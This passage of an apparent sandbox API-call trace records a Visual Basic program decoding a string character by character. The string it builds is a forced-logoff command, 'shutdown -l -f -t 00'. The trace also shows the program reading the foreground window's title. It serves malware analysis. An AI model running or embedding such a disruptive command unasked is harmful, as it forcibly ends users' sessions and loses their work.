cbMultiByte=1, lpWideCharStr=0x115979c, cchWideChar=1 | out: lpWideCharStr="g") returned 1 [0165.907] VarCat (in: pvarLeft=0x28f9f8, pvarRight=0x28f9b0, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.908] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.908] VarSub (in: pvarLeft=0x28f9d8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.908] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x11596fc, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0165.908] VarCat (in: pvarLeft=0x28f9f8, pvarRight=0x28f9b0, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.908] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.909] VarSub (in: pvarLeft=0x28f9d8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.909] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0x115979c, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0165.909] VarCat (in: pvarLeft=0x28f9f8, pvarRight=0x28f9b0, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.910] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.910] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.910] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x11596fc, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0165.910] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.910] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.910] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.911] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0165.911] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.911] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.911] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.911] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x1159724, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0165.911] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.912] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.912] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.912] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x11596fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0165.912] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.912] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.913] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.913] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0165.913] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.913] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.913] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.913] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x1159724, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0165.914] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.914] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.914] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.914] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x11596fc, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0165.914] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.915] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.915] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.915] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0165.915] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.915] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.916] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.916] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1159724, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0165.916] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.916] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.916] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.917] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x11596fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0165.917] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.917] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.917] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.917] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0165.917] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.918] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.918] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.918] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1159724, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0165.918] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.918] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.919] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.919] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x11596fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0165.919] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.919] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.919] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.919] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0165.920] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.920] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.920] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11596fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0165.920] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.921] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.921] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0165.921] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.973] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.973] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x11596fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0165.973] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.973] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0165.974] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.974] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.974] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x11596fc, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0165.974] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.975] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.975] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.975] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0165.975] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.975] GetForegroundWindow () returned 0x102c2 [0165.975] GetLastError () returned 0x0 [0165.976] SysStringLen (param_1=" ") returned 0xff [0165.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0165.976] SysStringLen (param_1=" ") returned 0xff [0165.976] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0165.976] GetWindowTextA (in: hWnd=0x102c2, lpString=0x11644c4, nMaxCount=255 | out: lpString="Activity Arrive Event") returned 21 [0165.976] GetLastError () returned 0x0 [0165.976] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0165.976] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0165.977] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0165.977] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Activity Arrive Event") returned 256 [0165.977] SysStringLen (param_1="Activity Arrive Event") returned 0x16 [0165.977] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Activity Arrive Event", cchWideChar=23, lpMultiByteStr=0x11470b4, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Activity Arrive Event", lpUsedDefaultChar=0x0) returned 23 [0165.977] SetWindowTextA (hWnd=0x103c4, lpString="Activity Arrive Event") returned 1 [0165.977] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x2 [0165.977] GetFocus () returned 0x0 [0165.977] lstrlenA (lpString="Activity Arrive Event") returned 21 [0165.978] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x11470b4) returned 0x1 [0165.978] IsWindow (hWnd=0x103c4) returned 1 [0165.978] IsWindow (hWnd=0x103c4) returned 1 [0165.978] IsWindow (hWnd=0x103c4) returned 1 [0165.978] IsWindow (hWnd=0x103c4) returned 1 [0165.979] GetFocus () returned 0x0 [0165.979] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x15 [0165.979] GetFocus () returned 0x0 [0165.979] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x16) returned 0x10e2b78 [0165.979] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x16, lParam=0x10e2b78) returned 0x15 [0165.979] GetFocus () returned 0x0 [0165.979] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 22 [0165.980] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=-1, lpWideCharStr=0x11470b4, cchWideChar=22 | out: lpWideCharStr="Activity Arrive Event") returned 22 [0165.980] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10e2b78 | out: hHeap=0x10d0000) returned 1 [0165.980] VarCmp (pvarLeft=0x28f990, pvarRight=0x28f9f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0165.981] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x28f8ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.981] VarSub (in: pvarLeft=0x28f9d8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.981] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="A", cbMultiByte=1, lpWideCharStr=0x11596fc, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0165.981] VarCat (in: pvarLeft=0x28f9f8, pvarRight=0x28f9b0, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.981] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="[", cchWideChar=1, lpMultiByteStr=0x28f8ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.981] VarSub (in: pvarLeft=0x28f9d8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.981] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="N", cbMultiByte=1, lpWideCharStr=0x1159724, cchWideChar=1 | out: lpWideCharStr="N") returned 1 [0165.981] VarCat (in: pvarLeft=0x28f9f8, pvarRight=0x28f9b0, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.982] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f8ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.982] VarSub (in: pvarLeft=0x28f9d8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.982] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0165.982] VarCat (in: pvarLeft=0x28f9f8, pvarRight=0x28f9b0, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.983] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x28f8ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.983] VarSub (in: pvarLeft=0x28f9d8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.983] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="A", cbMultiByte=1, lpWideCharStr=0x11596fc, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0165.983] VarCat (in: pvarLeft=0x28f9f8, pvarRight=0x28f9b0, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.983] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x28f8ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.983] VarSub (in: pvarLeft=0x28f9d8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.984] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="V", cbMultiByte=1, lpWideCharStr=0x1159724, cchWideChar=1 | out: lpWideCharStr="V") returned 1 [0165.984] VarCat (in: pvarLeft=0x28f9f8, pvarRight=0x28f9b0, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.988] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f8ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.989] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.989] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0165.989] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.989] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f8ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.989] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.989] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x115979c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0165.990] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.990] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f8ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.990] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.990] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x115974c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0165.990] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.991] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f8ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.991] VarSub (in: pvarLeft=0x28f9e8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.991] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0165.991] VarCat 